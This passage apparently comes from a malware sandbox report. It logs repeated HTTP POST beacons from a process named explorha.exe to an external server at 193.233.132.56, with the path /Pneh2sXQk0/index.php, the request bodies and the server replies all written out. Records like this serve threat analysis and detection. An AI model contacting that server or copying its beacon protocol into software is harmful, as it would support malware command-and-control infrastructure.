                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:16.449670076 CEST196INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:16 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    18192.168.2.449754193.233.132.56805900C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Apr 19, 2024 04:26:16.807365894 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:17.048388004 CEST219INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:16 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:17.049362898 CEST310OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:17.295758963 CEST196INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:17 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    19192.168.2.449755193.233.132.56805900C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Apr 19, 2024 04:26:17.656404018 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:17.899472952 CEST219INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:17 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:17.900146961 CEST310OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:18.148781061 CEST196INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:18 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    20192.168.2.449756193.233.132.56805900C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Apr 19, 2024 04:26:19.711950064 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:19.956800938 CEST219INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:19 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:19.958012104 CEST310OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:20.210747004 CEST196INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:20 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    21192.168.2.449757193.233.132.56805900C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Apr 19, 2024 04:26:20.732207060 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:20.975307941 CEST219INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:20 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:20.976015091 CEST310OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:21.222774982 CEST196INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:21 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    22192.168.2.449758193.233.132.56805900C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Apr 19, 2024 04:26:21.576457024 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:21.819334030 CEST219INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:21 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:21.820146084 CEST310OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:22.066276073 CEST196INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:21 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    23192.168.2.449759193.233.132.56805900C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Apr 19, 2024 04:26:22.422744036 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:22.669987917 CEST219INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:22 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:22.670697927 CEST310OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:22.926723003 CEST196INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:22 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    24192.168.2.449760193.233.132.56805900C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Apr 19, 2024 04:26:23.282666922 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:23.527075052 CEST219INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:23 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:23.527831078 CEST310OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:23.777892113 CEST196INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:23 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    25192.168.2.449761193.233.132.56805900C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Apr 19, 2024 04:26:24.134181023 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:24.373234034 CEST219INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:24 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:24.374032021 CEST310OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:24.617314100 CEST196INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:24 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    26192.168.2.449762193.233.132.56805900C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Apr 19, 2024 04:26:24.967010021 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:25.209677935 CEST219INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:25 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:25.210442066 CEST310OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:25.457503080 CEST196INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:25 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    27192.168.2.449763193.233.132.56805900C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Apr 19, 2024 04:26:25.818444967 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:26.070641994 CEST219INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:25 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:26.074642897 CEST310OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:26.331816912 CEST196INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:26 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    28192.168.2.449764193.233.132.56805900C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    TimestampBytes transferredDirectionData
